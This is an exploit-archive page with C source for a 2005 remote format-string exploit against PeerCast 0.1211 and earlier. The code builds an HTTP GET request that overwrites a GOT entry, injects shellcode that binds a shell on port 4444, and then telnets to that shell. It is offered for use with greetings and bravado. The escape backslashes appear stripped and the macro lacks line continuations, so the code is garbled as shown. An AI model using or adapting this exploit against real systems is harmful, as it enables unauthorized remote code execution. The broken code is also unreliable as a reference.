[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PeerCast <= 0.1211 Remote Format String Exploit
# Published : 2005-06-20
# Author : darkeagle
# Previous Title : MS Outlook Express NNTP Buffer Overflow Exploit (MS05-030)
# Next Title : ViRobot Advanced Server 2.0 (addschup) Remote Cookie Exploit 


/*
		PeerCast <= 0.1211 remote format string exploit 
/			     [<< Public Release >>]

/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]  
								
/	uKt researcherz [ http://unl0ck.org ]

/ greetz goes to: uKt researcherz.

/
 - smallest code - better code!!!
/
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>


//*******************************************
#define doit( b0, b1, b2, b3, addr )  { 
             b0 = (addr >> 24) & 0xff;  
             b1 = (addr >> 16) & 0xff;  
             b2 = (addr >>  8) & 0xff;  
             b3 = (addr      ) & 0xff;  
}
//*******************************************



//****************************************************************
char shellcode[] = // binds 4444 port
"x31xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x85"
"x4fxcaxdfx83xebxfcxe2xf4xb4x94x99x9cxd6x25xc8xb5"
"xe3x17x53x56x64x82x4ax49xc6x1dxacxb7x94x13xacx8c"
"x0cxaexa0xb9xddx1fx9bx89x0cxaex07x5fx35x29x1bx3c"
"x48xcfx98x8dxd3x0cx43x3ex35x29x07x5fx16x25xc8x86"
"x35x70x07x5fxccx36x33x6fx8ex1dxa2xf0xaax3cxa2xb7"
"xaax2dxa3xb1x0cxacx98x8cx0cxaex07x5f";
//****************************************************************


//****************************
#define HOST "127.0.0.1"
#define PORT 7144
#define GOTADDR 0x0809da9c
#define SHELLADDR 0x49adb23c
//****************************



//****************************************************************************************
char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
  char * buf;
  unsigned char b0, b1, b2, b3;
  int start = 256;

  doit( b0, b1, b2, b3, retaddr );
  buf = (char *)malloc(999);
  memset( buf, 0, 999 );

 b3 -= figure;
 b2 -= figure;
 b1 -= figure;
 b0 -= figure;

 snprintf( buf, 999,
           "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
	     b3 - 16 + start - base, offset, 
             b2 - b3 + start, offset + 1, 
             b1 - b2 + start, offset + 2,
             b0 - b1 + start, offset + 3 );

  return buf;
}
//****************************************************************************************




//****************************************************************************************
int
main( int argc, char * argv[] )
{
  struct sockaddr_in addr;
  int sock;
  char * fmt;
  char endian[31337], da_shell[31337];
  unsigned long locaddr, retaddr;
  unsigned int offset, base;
  unsigned char b0, b1, b2, b3;

  system("clear");
  printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*n");
  printf("*^*^*^                    by Darkeagle                 ^*^*^*n");
  printf("*^*^*^      uKt researcherz [ http://unl0ck.org ]      ^*^*^*nn");   

  memset( endian, 0x00, 31337 );
  memset( da_shell, 0x00, 31337 );

  addr.sin_family = AF_INET;
  addr.sin_port = htons(PORT);
  addr.sin_addr.s_addr = inet_addr(HOST);

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

  locaddr = GOTADDR;
  retaddr = SHELLADDR;
  offset  = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141

  doit( b0, b1, b2, b3, locaddr );

  base = 4;
  printf("[*] Buildin' evil coden");
  strcat(endian, "GET /html/en/index.html");
  snprintf( endian+strlen(endian), sizeof(endian),
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c",
             b3, b2, b1, b0,
             b3 + 1, b2, b1, b0,
             b3 + 2, b2, b1, b0,
             b3 + 3, b2, b1, b0 );

 fmt = evil_builder( retaddr, offset, base, 0x10 );

 memset(fmt+strlen(fmt), 0x55, 32);
 strcat(fmt, shellcode);
 strcat(endian, fmt);
 strcat(endian, "rnrnrn");
 printf("[+] Buildin' complete!n");
 sprintf(da_shell, "telnet %s 4444", HOST);

 // just go, y0!
 printf("[*] Connectin'n");
 if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf("[-] Connection failed!nn"); exit(0); }

 printf("[+] Connected!n");
 printf("[*] Sleepin'n");
 sleep(1);

 printf("[*] Sendin'n");
 send(sock, endian, strlen(endian), 0);

 printf("[*] Sleepin'n");
 sleep(1);
 	
 printf("[*] Connectin' in da shellnn");
 sleep(1);
 system(da_shell);
 return 0;
}
//****************************************************************************************

// www.Syue.com [2005-06-20]